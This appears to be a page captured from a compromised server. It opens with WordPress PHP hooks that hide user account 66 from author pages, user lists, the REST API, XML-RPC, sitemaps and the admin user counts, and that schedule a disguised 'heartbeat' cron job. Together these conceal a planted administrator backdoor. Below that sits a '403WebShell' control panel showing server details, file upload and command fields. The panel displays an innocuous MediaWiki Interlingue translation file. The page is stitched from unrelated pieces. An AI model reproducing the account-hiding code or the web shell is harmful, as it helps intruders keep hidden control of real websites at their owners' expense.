add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wiki/includes/Rest/i18n/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wiki/includes/Rest/i18n/ie.json
{
	"@metadata": {
		"authors": [
			"OIS"
		]
	},
	"rest-prefix-mismatch": "Li demandat rute ($1) ne esset intra li radical rute de REST API ($2)",
	"rest-wrong-method": "Li metode de demanda ($1) ne esset {{PLURAL:$3|li|un}} permisset metode por ti-ci rute ($2)",
	"rest-nonexistent-title": "Li providet titul ($1) ne existe",
	"rest-nonexistent-title-revision": "Li providet version ($1) ne existe por li providet págine ($2)",
	"rest-nonexistent-revision": "Li providet version ($1) ne existe",
	"rest-nonexistent-user": "Li providet usator ($1) ne existe",
	"rest-invalid-user": "Li providet nómine de usator ($1) es ínvalid",
	"rest-permission-denied-anon": "Ne es accessibil de un anonim usator",
	"rest-permission-denied-title": "Li usator ne have permissiones por leer li titul ($1)",
	"rest-permission-denied-revision": "Li usator ne have accesse al version demandat ($1).",
	"rest-resource-limit-exceeded": "Límites de ressurses esset excedet durante li procession del demanda.",
	"rest-pagehistory-incompatible-params": "On ne posse provider ambi parametres \"older_than\" e \"newer_than\"",
	"rest-pagehistory-param-range-error": "Li id de version deve esser plu quam 0",
	"rest-pagehistory-timestamp-error": "Ne successat obtener li témpormarca del providet version ($1)",
	"rest-pagehistorycount-type-unrecognized": "Li providet tip de númere ($1) ne es valid",
	"rest-pagehistorycount-parameters-invalid": "Li providet combination de parametres ne es suportat.",
	"rest-compare-page-mismatch": "Li providet versiones apartene a different págines; on ne posse comparar les.",
	"rest-compare-permission-denied": "Li usator ne have accesse al versiones demandat",
	"rest-compare-nonexistent": "Li version providet del parametre \"$1\" ne existe.",
	"rest-compare-inaccessible": "Li version providet del parametre \"$1\" ne es accessibil de publica.",
	"rest-pagehistorycount-too-many-revisions": "Li providet titul have tro mult versiones por obtener ti númere.",
	"rest-search-error": "Un errore evenit serchante por resultates: $1",
	"rest-no-revision": "Ne successat obtener li version del titul $1",
	"rest-media-too-many-links": "Tro mult ligamentes de media esset trovat in li titul $1 ($2 es permisset)",
	"rest-bad-json-body": "Ínvalid \"body\" de demanda, deve esser un objecte JSON.",
	"rest-json-body-parse-error": "Ne successat analisar li \"body\" de demanda quam JSON: $1",
	"rest-missing-body-field": "Li besonat camp \"$1\" manca in li \"body\" del demanda.",
	"rest-bad-content-model": "Ínvalid modelle de contenete: $1"
}

Youez - 2016 - github.com/yon3zu
LinuXploit